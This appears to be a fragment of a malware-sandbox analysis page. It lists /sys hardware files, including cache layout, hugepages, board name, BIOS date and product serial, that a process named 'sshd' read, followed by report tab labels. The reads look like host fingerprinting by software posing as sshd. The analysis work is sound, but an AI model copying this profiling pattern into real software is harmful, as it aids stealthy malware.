/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	sshd
/sys/bus/cpu/devices/cpu0/cache/index2/type	/sys/bus/cpu/devices/cpu0/cache/index2/type	sshd
/sys/kernel/mm/hugepages	/sys/kernel/mm/hugepages	sshd
/sys/devices/virtual/dmi/id/board_name	/sys/devices/virtual/dmi/id/board_name	sshd
/sys/devices/virtual/dmi/id/bios_date	/sys/devices/virtual/dmi/id/bios_date	sshd
/sys/bus/cpu/devices/cpu0/cache/index3/type	/sys/bus/cpu/devices/cpu0/cache/index3/type	sshd
/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	sshd
/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	sshd
/sys/bus/node/devices/node0/access1/initiators	/sys/bus/node/devices/node0/access1/initiators	sshd
/sys/bus/node/devices/node0/access0/initiators/read_latency	/sys/bus/node/devices/node0/access0/initiators/read_latency	sshd
/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	sshd
/sys/devices/virtual/dmi/id/product_serial	/sys/devices/virtual/dmi/id/product_serial	sshd
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
/sys/bus/cpu/devices/cpu0/cpu_capacity	/sys/bus/cpu/devices/cpu0/cpu_capacity	sshd
/sys/bus/node/devices/node0/cpumap	/sys/bus/node/devices/node0/cpumap	sshd

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads